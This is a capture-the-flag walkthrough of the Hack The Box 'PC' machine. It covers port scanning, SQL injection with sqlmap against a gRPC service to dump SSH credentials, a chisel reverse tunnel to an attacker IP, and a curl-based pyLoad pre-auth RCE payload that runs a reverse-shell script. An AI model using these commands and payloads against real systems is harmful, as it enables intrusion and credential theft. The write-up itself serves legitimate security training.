--- title: 'PC HacktheBox Walkthrough' --- # PC Walkthrough Writeup of Hack The Box PC ## Table of Content [TOC] Enumeration --- As with every box on hack the box, the first approach to pwning the box is reconnaissance, which is gathering as much information you can to understand more about the box, the objective here is to gain an understanding of the box ### Initial port scanning `nmap -p$(nmap -p- --min-rate=1000 -T4 $IP -Pn | grep ^[0-9] | cut -d "/" -f 1 | tr "\\n" "," | sed s/,$//) -sC -sV -Pn -vvv $IP -oN scan.txt` **Nmap results** ``` PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-host key: | 3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChKXbRHNGTarynUVI8hN9pa0L2IvoasvTgCN80atXySpKMerjyMlVhG9QrJr62jtGg4J39fqxW06LmUCWBa0IxGF0thl2JCw3zyCqq0y8+hHZk0S3Wk9IdNcvd2Idt7SBv7v7x+u/zuDEryDy8aiL1AoqU86YYyiZBl4d2J9HfrlhSBpwxInPjXTXcQHhLBU2a2NA4pDrE9TxVQNh75sq3+G9BdPDcwSx9Iz60oWlxiyLcoLxz7xNyBb3PiGT2lMDehJiWbKNEOb+JYp4jIs90QcDsZTXUh3thK4BDjYT+XMmUOvinEeDFmDpeLOH2M42Zob0LtqtpDhZC+dKQkYSLeVAov2dclhIpiG12IzUCgcf+8h8rgJLDdWjkw+flh3yYnQKiDYvVC+gwXZdFMay7Ht9ciTBVtDnXpWHVVBpv4C7efdGGDShWIVZCIsLboVC+zx1/RfiAI5/O7qJkJVOQgHH/2Y2xqD/PX4T6XOQz1wtBw1893ofX3DhVokvy+nM= | 256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPqhx1OUw1d98irA5Ii8PbhDG3KVbt59Om5InU2cjGNLHATQoSJZtm9DvtKZ+NRXNuQY/rARHH3BnnkiCSyWWJc= | 256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBG1KtV14ibJtSel8BP4JJntNT3hYMtFkmOgOVtyzX/R 50051/tcp open unknown syn-ack 1 service was unrecognized despite returning data. ``` checking out port 50051, on the web browser we see it leads to nothing.  Community Attack Vector --- Gathering some information on port 50051 indicates that it's a ***gRPC*** service. **references** https://documentation.softwareag.com/webmethods/compendiums/v10-11/C_API_Management/index.html#page/api-mgmt-comp/to-grpc_configuration_7.html Next is to figure out how to interact with gRPC client, researching for the best tool to interact I landed on https://github.com/fullstorydev/grpcui an interactive web UI for gRPC. so after running the command with --plaintext it uses plain-text HTTP/2 when connecting to the server (no TLS). ``` ./grpcui --plaintext 10.10.11.214:50051 ``` It opens up a web interface  Interacting with the GUI, I created a user to understand its functionality.  After logging in we are presented with some tokens, via the response.  Trying to get info on our newly created user, we are presented with an error 'Authorization Error. Missing "token" header', so get work through this the token we got previously we'll try and use it and see the response.  From the message response we get an error which arises when attempting to access elements within a non-existent or uninitialized object, so have this in mind when creating a user as we did earlier, it must be stored somewhere in the system a database for instance, so first thought was to put the request on sqlmap and tweak the data section with an asterix to the id.  After running it through sqlmap, the tweaked parameter gives us good results.  Initial Access --- Using Sqlmap we dump the database and get some credentials, a user and a password which will enable us to log in with SSH.  Further Enumeration --- Now we are logged in as sau and get the user flag.   After that, we need to enumerate further to get the root flag as that is our aim to pwn the box. Checking the running services on the box. `netstat -tulpn`  There is port 8000 which seems interesting, We need to expose it and for that to be possible we need to set a reverse proxy using [chisel](https://github.com/jpillora/chisel) a tool that can be used to setup tunneled connections. From the attacker's terminal, we need the following syntax. `chisel server -p 433 --socks5 --reverse -v` From the compromised victim we need to expose the port `8000` using the following syntax. `chisel client 10.10.14.46:443 R:8001:127.0.0.1:8000` we get a successful hit and redirect to the internal webpage.   ## Root Instantly searching for pyLoad we get a vulnerability that allows pre-auth Remote Code Execution.  [reference](https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/) checking out the exploit code, we can insert our own code to get a reverse shell as the vulnerability suggests. So we need to make slight modifications to the command and execute it to get a shell back to our own local machine. `curl -i -s -k -X $'POST' \ --data-binary $'jk=pyimport%20os;os.system(\"bash%20/tmp/ape.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \ $'http://127.0.0.1:8000/flash/addcrypted2'` After the modification, we get a connection back and get the flag.